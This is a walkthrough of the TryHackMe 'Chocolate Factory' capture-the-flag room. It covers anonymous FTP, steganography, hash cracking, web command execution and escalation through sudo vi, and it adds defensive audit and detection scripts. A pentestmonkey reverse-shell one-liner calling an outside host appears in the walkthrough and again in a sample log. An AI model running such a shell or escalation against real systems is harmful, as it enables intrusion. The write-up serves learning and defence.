Chocolate Factory | THM
A Charlie And The Chocolate Factory themed room, revisit Willy Wonka’s chocolate factory!
Let’s begin this box.
As usual, we start with an nmap scan:
nmap -sV -sC machine_IP
Taking a peek at the nmap scan result we can see that ports 22, 21, 80 and 100 are open. As the scan result notes, port 21 allows anonymous login, so we proceed with enumeration on that port.
Logging in to FTP with the username and password “anonymous”, we find a PNG image. I’m curious: is this some type of steganography?
Let’s find out. I downloaded the image to my local machine:
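The anonymous-FTP finding above is worth looking at from the other side of the wire too. The following is an added example (not from the room or the walkthrough) that parses a vsftpd-style config and flags the directives that open the server to unauthenticated clients; the two configs are constructed for illustration, and the directive names are real vsftpd.conf keys.

```python
"""Audit a vsftpd-style config for anonymous access (added example, not from the room)."""

# Constructed: a weak config of the kind the nmap script reported (anonymous login on).
WEAK_CONF = """\
listen=YES
anonymous_enable=YES
anon_upload_enable=NO
local_enable=YES
"""

# Constructed: the same config with anonymous access explicitly turned off.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
local_enable=YES
"""

# Directives whose YES value widens anonymous access, with the reason each is flagged.
RISKY_WHEN_YES = {
    "anonymous_enable": "unauthenticated clients can log in and read files",
    "anon_upload_enable": "unauthenticated clients can upload files",
    "anon_mkdir_write_enable": "unauthenticated clients can create directories",
}

def parse_vsftpd(text):
    """Return {key: value} for key=value lines; comments and blank lines are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip().upper()
    return settings

def audit_vsftpd(text):
    """Return a list of (directive, reason) findings for anonymous-access settings."""
    settings = parse_vsftpd(text)
    findings = [(key, why) for key, why in RISKY_WHEN_YES.items()
                if settings.get(key) == "YES"]
    # The vsftpd man page lists YES as the compiled-in default for anonymous_enable,
    # so a config that never mentions it is not hardened either.
    if "anonymous_enable" not in settings:
        findings.append(("anonymous_enable",
                         "not set; vsftpd's compiled-in default is YES, so set it explicitly"))
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_vsftpd(conf)
        print(f"{name}: {len(findings)} finding(s)")
        for key, why in findings:
            print(f"  {key} -> {why}")
```

The same check can be pointed at a real `/etc/vsftpd.conf`; the point is that “anonymous login allowed” in an nmap script result is one line in a config file away from being fixed.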
get file_name.png /local_directory/filename.png
Let’s analyze the obtained file.
This looks like an image of chewing gum. It’s always a good habit to look into an image file; you never know what may be hidden inside. We can use the steghide tool, or any other tool of your choice, but I have selected Steghide and will proceed with it.
C’mon, let’s reveal the hidden data.
++STEGANOGRAPHY with STEGHIDE++
steghide extract -sf file_name
Voila! As soon as I pressed Enter without any password, it was accepted.
Looking into the obtained file, yes, this is a base64-encoded hash. Now we decode it and see what information it gives; here we can use CyberChef for decoding the base64.
Now we need to crack the hash, so I’m going to use hashcat to crack it and get user charlie’s password.
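The two steps above (base64-decode the steghide output, then hand the resulting hash to hashcat) can be understood with a small worked example. This is added code, not part of the walkthrough or the room: the password and hash below are constructed here, and the length table is the same heuristic that hash-identifier tools use to pick a hashcat mode for an unsalted hex digest.

```python
import base64
import hashlib
import re

# Constructed for this example: the SHA-256 hex digest of a made-up password, wrapped
# in base64 the way the steghide output in the room was. Not the room's real data.
SAMPLE_PASSWORD = "golden-ticket-sample"
SAMPLE_B64 = base64.b64encode(
    hashlib.sha256(SAMPLE_PASSWORD.encode()).hexdigest().encode()
).decode()

# Unsalted hex digests can only be told apart by length; this is the first thing to
# establish, because hashcat needs the right mode for the hash family.
HEX_DIGEST_LENGTHS = {32: "MD5", 40: "SHA-1", 56: "SHA-224", 64: "SHA-256", 128: "SHA-512"}

def decode_base64_text(b64):
    """Decode base64 (tolerating stripped padding) to ASCII text; None if it is not text."""
    b64 = b64.strip()
    b64 += "=" * (-len(b64) % 4)
    try:
        return base64.b64decode(b64, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None

def identify_hex_digest(value):
    """Name the unsalted hash family matching a hex string's length, or None."""
    value = value.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", value):
        return None
    return HEX_DIGEST_LENGTHS.get(len(value))

def matches_candidate(hex_digest, algo_name, candidate):
    """True if hashing the candidate with the identified family reproduces the digest.

    This single comparison is all a cracker does, repeated at very high speed, which
    is why an unsalted fast hash of a guessable password protects almost nothing.
    """
    algo = hashlib.new(algo_name.replace("-", "").lower())
    algo.update(candidate.encode())
    return algo.hexdigest() == hex_digest.strip().lower()

if __name__ == "__main__":
    digest = decode_base64_text(SAMPLE_B64)
    family = identify_hex_digest(digest)
    print(f"decoded: {digest}\nlooks like: {family}")
    print("candidate matches:", matches_candidate(digest, family, SAMPLE_PASSWORD))
```

The defensive takeaway is the inverse of the cracking step: store passwords with a salted, deliberately slow scheme (bcrypt, scrypt or Argon2), and a recovered digest like this one stops being a short detour to a login.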
Now we have a username and password, so head to the machine’s webpage and you’re greeted with this login page:
Enter your credentials and proceed.
If my ‘ls’ command is working, why not try other commands? Proceeding further, I noticed a key file and submitted it as the answer to the related question.
So commands are working; then why not proceed with a reverse shell?
Simultaneously we set up netcat to listen for the reverse connection.
Here we go.
This reverse shell one-liner was taken from pentestmonkey’s Reverse Shell Cheat Sheet:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
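That one-liner is also a good test case for the blue team. The following is an added example (not from the walkthrough or from pentestmonkey) of detection logic run over a few constructed process-creation events: it looks for the named-pipe/interactive-shell/nc combination in a command line, and separately for any shell spawned by a web server process, which is how command injection through a web form shows up in process telemetry.

```python
import re

# Constructed sample process-creation events (not real logs from this room), one per
# line, tab-separated: timestamp, parent process name, full command line.
SAMPLE_PROCESS_LOG = """\
2024-01-01T10:00:01Z\tbash\tls -la /var/www/html
2024-01-01T10:00:05Z\tapache2\tsh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
2024-01-01T10:00:09Z\tcron\t/usr/bin/python3 /opt/backup.py
2024-01-01T10:00:12Z\tsshd\tbash -i
"""

# The fifo-based one-liner has three parts that rarely appear together in benign
# commands: a named pipe (mkfifo), an interactive shell reading from it, and nc.
FIFO_NC_SHELL = re.compile(r"mkfifo\s+\S+.*\|\s*(?:/bin/)?(?:ba)?sh\s+-i\b.*\|\s*nc\b")

# A web server process should serve requests, not launch shells; a shell child of one
# deserves a look regardless of what the shell was asked to run.
WEB_SERVER_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}
SHELL_LAUNCH = re.compile(r"^(?:/bin/|/usr/bin/)?(?:ba|da)?sh\b")

def parse_event(line):
    """Split one tab-separated event into its fields."""
    ts, parent, cmd = line.split("\t", 2)
    return {"ts": ts, "parent": parent, "cmd": cmd}

def detect(log_text):
    """Return one (timestamp, rule_name, command) tuple per rule hit, in log order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if FIFO_NC_SHELL.search(ev["cmd"]):
            hits.append((ev["ts"], "fifo_nc_reverse_shell", ev["cmd"]))
        if ev["parent"] in WEB_SERVER_PARENTS and SHELL_LAUNCH.match(ev["cmd"]):
            hits.append((ev["ts"], "shell_spawned_by_web_server", ev["cmd"]))
    return hits

if __name__ == "__main__":
    for ts, rule, cmd in detect(SAMPLE_PROCESS_LOG):
        print(f"{ts} {rule}: {cmd}")
```

The second rule is the more durable of the two: the exact reverse shell string changes from cheat sheet to cheat sheet, but a web server forking `sh` is a parent/child relationship that an attacker cannot easily avoid once they are executing commands through the application.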
After setting the port and machine IP in netcat and in the reverse shell script,
we got a shell. Hooray!
We don’t have permission to open the file.
Exploring each file in the directory.
We proceed further by using this key to log in as the given user.
To check the permissions we type sudo -l, and here we find that this particular user can execute “/usr/bin/vi”.
I decided to take a look at GTFOBins (the vi entry) for an escalation method: modern Unix systems run a shell binary when vi asks for one, so the editor can be used to break out of a restricted environment.
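The `sudo -l` result above is the kind of thing an administrator can catch before a player (or an intruder) does. The following is an added example (not from the room or the walkthrough) that parses user-specification lines from a sudoers file and flags rules granting an editor that can spawn a shell; the sudoers lines are constructed, and the flagged-binary list is deliberately limited to the vi/vim case discussed on this page.

```python
import os
import re

# Constructed sample sudoers user specifications (not the room's actual file).
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
charlie ALL=(ALL) NOPASSWD: /usr/bin/vi
backup  ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
deploy  ALL=(ALL) /usr/bin/systemctl restart app
"""

# Binaries that can run a shell from inside themselves, so sudo on the binary is
# effectively sudo on a root shell. Kept to the editor case this page is about.
SHELL_CAPABLE = {
    "vi": "vi can start a shell from inside the editor; use sudoedit for editing tasks",
    "vim": "vim can start a shell from inside the editor; use sudoedit for editing tasks",
}

# user  host=(runas) [TAG:]... command[, command]...
ENTRY_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<spec>.+)$")

def parse_sudoers(text):
    """Return (user, runas, tags, [commands]) for each user specification line."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue  # Defaults, aliases and includes are out of scope here
        spec = m.group("spec")
        tags = []
        while True:  # peel off leading tags such as NOPASSWD: or SETENV:
            tag = re.match(r"([A-Z]+):\s*", spec)
            if not tag:
                break
            tags.append(tag.group(1))
            spec = spec[tag.end():]
        commands = [c.strip() for c in spec.split(",") if c.strip()]
        entries.append((m.group("user"), m.group("runas"), tags, commands))
    return entries

def audit_sudoers(text):
    """Return (user, command, reason) for every rule that hands out a shell-capable editor."""
    findings = []
    for user, runas, tags, commands in parse_sudoers(text):
        for cmd in commands:
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_CAPABLE:
                findings.append((user, cmd, SHELL_CAPABLE[binary]))
    return findings

if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} -> {reason}")
```

The fix the finding points at is `sudoedit` (or `sudo -e`): it copies the target file, runs the editor as the invoking user rather than root, and copies the result back, so a shell started from inside the editor has only the user’s own privileges.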
Voila, I’m root! Now we can cat root.txt and get our flag:
Executing root.py with Python prompts us with “Enter the key”.
As soon as we enter the obtained key, it gives us the flag.
Finally it’s pwned and we obtained the desired flag.
Revisiting Willy Wonka’s Chocolate Factory and meeting the Oompa Loompas was nice. This was an easy box which included all the entry-level techniques.
Thanks for reading.
HAPPY HACKING !